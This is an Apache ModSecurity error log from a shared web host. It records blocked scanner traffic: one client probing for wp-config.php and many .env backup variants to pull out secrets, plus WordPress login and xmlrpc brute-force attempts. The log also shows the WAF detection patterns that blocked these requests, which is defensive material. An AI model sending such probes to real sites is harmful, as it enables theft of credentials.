[Tue May 26 17:43:32.100112 2026] [security2:error] [pid 924957:tid 925141] [client 208.84.101.154:3834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 154.101.84.208.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/wp-config.php"] [unique_id "ahWObOYv2AvxeXULfJdUbgAAADY"]
[Tue May 26 17:43:32.558665 2026] [security2:error] [pid 924957:tid 925167] [client 208.84.101.154:3866] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/wp-config.php~"] [unique_id "ahWObOYv2AvxeXULfJdUhAAAAFA"]
[Tue May 26 17:43:33.469234 2026] [security2:error] [pid 924957:tid 925123] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWObeYv2AvxeXULfJdUkgAAACQ"]
[Tue May 26 17:43:33.853759 2026] [security2:error] [pid 924957:tid 925135] [client 208.84.101.154:3858] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/.env.production.copy"] [unique_id "ahWObeYv2AvxeXULfJdUsAAAADA"]
[Tue May 26 17:43:34.623142 2026] [security2:error] [pid 924957:tid 925146] [client 94.26.106.56:54003] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cpcontacts.whitesun.in"] [uri "/wp-login.php"] [unique_id "ahWObuYv2AvxeXULfJdUugAAADs"], referer: https://www.bing.com/
[Tue May 26 17:43:34.936774 2026] [security2:error] [pid 924957:tid 925098] [client 94.26.106.56:50843] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cpcontacts.whitesun.in"] [uri "/wp-login.php"] [unique_id "ahWObuYv2AvxeXULfJdUyQAAAAs"], referer: https://www.google.com/search?q=wordpress
[Tue May 26 17:43:35.069733 2026] [security2:error] [pid 924957:tid 925195] [client 185.191.171.5:30600] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/7/"] [unique_id "ahWOb-Yv2AvxeXULfJdUzgAAAGw"]
[Tue May 26 17:43:35.069845 2026] [security2:error] [pid 924957:tid 925195] [client 185.191.171.5:30600] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/7/"] [unique_id "ahWOb-Yv2AvxeXULfJdUzgAAAGw"]
[Tue May 26 17:43:35.419212 2026] [proxy:error] [pid 924957:tid 925091] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:43:35.419259 2026] [proxy_http:error] [pid 924957:tid 925091] [client 94.26.106.56:58152] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: https://wordpress.org/
[Tue May 26 17:43:35.419934 2026] [proxy:error] [pid 924957:tid 925091] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:43:35.419970 2026] [proxy_http:error] [pid 924957:tid 925091] [client 94.26.106.56:58152] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: https://wordpress.org/
[Tue May 26 17:43:35.749765 2026] [security2:error] [pid 924957:tid 925028] [remote 216.73.216.30:8535] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWOb-Yv2AvxeXULfJdU3QAAK0Y"]
[Tue May 26 17:43:35.809849 2026] [security2:error] [pid 924957:tid 925185] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOb-Yv2AvxeXULfJdU0gAAAGI"]
[Tue May 26 17:43:36.188472 2026] [autoindex:error] [pid 924957:tid 925156] [client 43.155.157.239:53302] AH01276: Cannot serve directory /home1/micro3e1/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:43:37.351874 2026] [security2:error] [pid 924957:tid 925123] [client 208.84.101.154:4028] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/.env.local.backup"] [unique_id "ahWOceYv2AvxeXULfJdVFgAAACQ"]
[Tue May 26 17:43:37.352007 2026] [security2:error] [pid 924957:tid 925134] [client 208.84.101.154:4024] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/.env.local.old"] [unique_id "ahWOceYv2AvxeXULfJdVHAAAAC8"]
[Tue May 26 17:43:37.352067 2026] [security2:error] [pid 924957:tid 925103] [client 208.84.101.154:4086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/.env.production.bak"] [unique_id "ahWOceYv2AvxeXULfJdVFQAAABA"]
[Tue May 26 17:43:37.352069 2026] [security2:error] [pid 924957:tid 925168] [client 208.84.101.154:4110] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/.env.production.backup"] [unique_id "ahWOceYv2AvxeXULfJdVFAAAAFE"]
[Tue May 26 17:43:37.352541 2026] [security2:error] [pid 924957:tid 925130] [client 208.84.101.154:4074] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/.env.local.orig"] [unique_id "ahWOceYv2AvxeXULfJdVGQAAACs"]
[Tue May 26 17:43:37.352642 2026] [security2:error] [pid 924957:tid 925107] [client 208.84.101.154:4062] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/.env.local.swp"] [unique_id "ahWOceYv2AvxeXULfJdVGAAAABQ"]
[Tue May 26 17:43:37.352672 2026] [security2:error] [pid 924957:tid 925185] [client 208.84.101.154:4056] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/.env.local~"] [unique_id "ahWOceYv2AvxeXULfJdVGgAAAGI"]
[Tue May 26 17:43:37.352830 2026] [security2:error] [pid 924957:tid 925141] [client 208.84.101.154:4020] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/.env.local.bak"] [unique_id "ahWOceYv2AvxeXULfJdVFwAAADY"]
[Tue May 26 17:43:37.353428 2026] [security2:error] [pid 924957:tid 925131] [client 208.84.101.154:3990] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/.env.swp"] [unique_id "ahWOceYv2AvxeXULfJdVIAAAACw"]
[Tue May 26 17:43:37.353428 2026] [security2:error] [pid 924957:tid 925196] [client 208.84.101.154:4012] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/.env.copy"] [unique_id "ahWOceYv2AvxeXULfJdVHgAAAG0"]
[Tue May 26 17:43:37.353474 2026] [security2:error] [pid 924957:tid 925171] [client 208.84.101.154:4006] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/.env.orig"] [unique_id "ahWOceYv2AvxeXULfJdVHwAAAFQ"]
[Tue May 26 17:43:37.353500 2026] [security2:error] [pid 924957:tid 925134] [client 208.84.101.154:3986] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/.env~"] [unique_id "ahWOceYv2AvxeXULfJdVIQAAAC8"]
[Tue May 26 17:43:37.353557 2026] [security2:error] [pid 924957:tid 925087] [client 208.84.101.154:4102] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/.env.production.old"] [unique_id "ahWOceYv2AvxeXULfJdVHQAAAAA"]
[Tue May 26 17:43:37.354337 2026] [security2:error] [pid 924957:tid 925210] [client 208.84.101.154:4128] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/.env.production~"] [unique_id "ahWOceYv2AvxeXULfJdVEgAAAHs"]
[Tue May 26 17:43:37.355072 2026] [security2:error] [pid 924957:tid 925196] [client 208.84.101.154:3948] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/.env.bak"] [unique_id "ahWOceYv2AvxeXULfJdVJQAAAG0"]
[Tue May 26 17:43:37.355521 2026] [security2:error] [pid 924957:tid 925088] [client 208.84.101.154:4160] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/.env.production.orig"] [unique_id "ahWOceYv2AvxeXULfJdVEAAAAAE"]
[Tue May 26 17:43:37.356098 2026] [security2:error] [pid 924957:tid 925127] [client 208.84.101.154:4082] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/.env.local.copy"] [unique_id "ahWOceYv2AvxeXULfJdVKwAAACg"]
[Tue May 26 17:43:37.356222 2026] [security2:error] [pid 924957:tid 925197] [client 208.84.101.154:4144] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/.env.production.swp"] [unique_id "ahWOceYv2AvxeXULfJdVEQAAAG4"]
[Tue May 26 17:43:37.356677 2026] [security2:error] [pid 924957:tid 925134] [client 208.84.101.154:3964] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/.env.old"] [unique_id "ahWOceYv2AvxeXULfJdVJAAAAC8"]
[Tue May 26 17:43:37.356978 2026] [security2:error] [pid 924957:tid 925097] [client 208.84.101.154:3980] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/.env.backup"] [unique_id "ahWOceYv2AvxeXULfJdVLAAAAAo"]
[Tue May 26 17:43:38.036088 2026] [security2:error] [pid 924957:tid 925146] [client 146.174.176.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOceYv2AvxeXULfJdVSAAAADs"]
[Tue May 26 17:43:38.379441 2026] [security2:error] [pid 924957:tid 925160] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOceYv2AvxeXULfJdVWAAAAEk"]
[Tue May 26 17:43:38.419509 2026] [security2:error] [pid 924957:tid 925144] [client 208.84.101.154:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOceYv2AvxeXULfJdVNwAAADk"]
[Tue May 26 17:43:38.444662 2026] [security2:error] [pid 924957:tid 925208] [client 208.84.101.154:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOceYv2AvxeXULfJdVPgAAAHk"]
[Tue May 26 17:43:38.446613 2026] [security2:error] [pid 924957:tid 925142] [client 208.84.101.154:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOceYv2AvxeXULfJdVPQAAADc"]
[Tue May 26 17:43:38.446614 2026] [security2:error] [pid 924957:tid 925140] [client 208.84.101.154:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOceYv2AvxeXULfJdVPAAAADU"]
[Tue May 26 17:43:38.451201 2026] [security2:error] [pid 924957:tid 925126] [client 208.84.101.154:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOceYv2AvxeXULfJdVOgAAACc"]
[Tue May 26 17:43:38.453038 2026] [security2:error] [pid 924957:tid 925152] [client 208.84.101.154:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOceYv2AvxeXULfJdVMAAAAEE"]
[Tue May 26 17:43:38.458428 2026] [security2:error] [pid 924957:tid 925200] [client 208.84.101.154:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOceYv2AvxeXULfJdVOQAAAHE"]
[Tue May 26 17:43:38.478090 2026] [security2:error] [pid 924957:tid 925093] [client 208.84.101.154:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOceYv2AvxeXULfJdVOAAAAAY"]
[Tue May 26 17:43:38.487133 2026] [security2:error] [pid 924957:tid 925106] [client 208.84.101.154:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWOceYv2AvxeXULfJdVNgAAABM"]
[Tue May 26 17:43:39.139726 2026] [security2:error] [pid 924957:tid 925116] [client 23.158.233.122:57255] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.233.158.23.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWOcuYv2AvxeXULfJdVcQAAAB0"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 17:43:39.139852 2026] [security2:error] [pid 924957:tid 925116] [client 23.158.233.122:57255] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWOcuYv2AvxeXULfJdVcQAAAB0"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 17:43:39.152702 2026] [security2:error] [pid 924957:tid 925120] [client 209.99.189.98:60771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.189.99.209.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/images/images/cache.php"] [unique_id "ahWOc-Yv2AvxeXULfJdVcgAAACE"], referer: www.google.com
[Tue May 26 17:43:39.510868 2026] [security2:error] [pid 924957:tid 925164] [client 23.158.233.122:57276] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWOc-Yv2AvxeXULfJdVfgAAAE0"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 17:43:40.358919 2026] [security2:error] [pid 924957:tid 924982] [remote 172.104.164.56:52116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.164.104.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWOdOYv2AvxeXULfJdVoQAAZRg"]
[Tue May 26 17:43:40.583900 2026] [security2:error] [pid 924957:tid 925149] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOdOYv2AvxeXULfJdVoAAAAD4"]
[Tue May 26 17:43:41.036787 2026] [security2:error] [pid 924957:tid 925063] [remote 216.73.216.30:65296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWOdeYv2AvxeXULfJdVsAAAKWk"]
[Tue May 26 17:43:41.497944 2026] [security2:error] [pid 924957:tid 925134] [client 74.7.230.35:37844] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.dhmwayanad.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWOdeYv2AvxeXULfJdVwAAAL2o"]
[Tue May 26 17:43:41.800090 2026] [security2:error] [pid 924957:tid 925122] [client 205.185.127.250:62812] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 250.127.185.205.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "greattusker.com"] [uri "/wp-login.php"] [unique_id "ahWOdeYv2AvxeXULfJdVwQAAACM"]
[Tue May 26 17:43:43.626678 2026] [security2:error] [pid 924957:tid 925142] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOd-Yv2AvxeXULfJdV7wAAADc"]
[Tue May 26 17:43:44.955391 2026] [autoindex:error] [pid 924957:tid 925208] [client 34.63.226.73:0] AH01276: Cannot serve directory /home2/glorolle/public_html/aeromodellingconsultants.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://aeromodellingconsultants.com
[Tue May 26 17:43:45.178681 2026] [security2:error] [pid 924957:tid 925213] [client 209.99.189.98:61306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.189.99.209.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/images/images/cache.php"] [unique_id "ahWOeeYv2AvxeXULfJdWRQAAAH4"], referer: www.google.com
[Tue May 26 17:43:45.376279 2026] [security2:error] [pid 924957:tid 925194] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOeOYv2AvxeXULfJdWQgAAAGs"]
